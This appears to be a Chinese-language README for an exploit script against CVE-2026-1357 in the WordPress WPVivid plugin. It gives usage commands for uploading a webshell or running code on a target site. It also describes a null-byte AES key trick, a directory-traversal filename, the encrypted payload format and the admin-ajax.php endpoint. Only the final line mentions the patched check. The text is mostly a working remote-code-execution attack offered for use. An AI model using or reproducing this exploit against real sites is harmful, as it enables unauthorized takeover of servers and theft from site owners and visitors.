
CVE-2026-1357 在 WordPress WPVivid 插件中的漏洞利用,可通过精心构造的 AES 加密载荷和目录遍历上传 WebShell,实现远程代码执行。
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" 技术说明: Null Byte Key:当RSA解密失败时,返回false,phpseclib将其视为"\x00\x00\x00"。我们使用16个null字节作为AES-128 ECB密钥。 目录遍历:文件名未经过净化处理,允许使用../../../../wp-content/uploads/shell.php 载荷格式:
[len_key_hex(2字节)] + [key_hex] + [len_data_hex(16字节)] + [encrypted_data] 执行: POST到 /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(加密后的载荷) 检测与缓解措施:
已在0.9.124版本中修补:
if ($key === false || empty($key)) return false;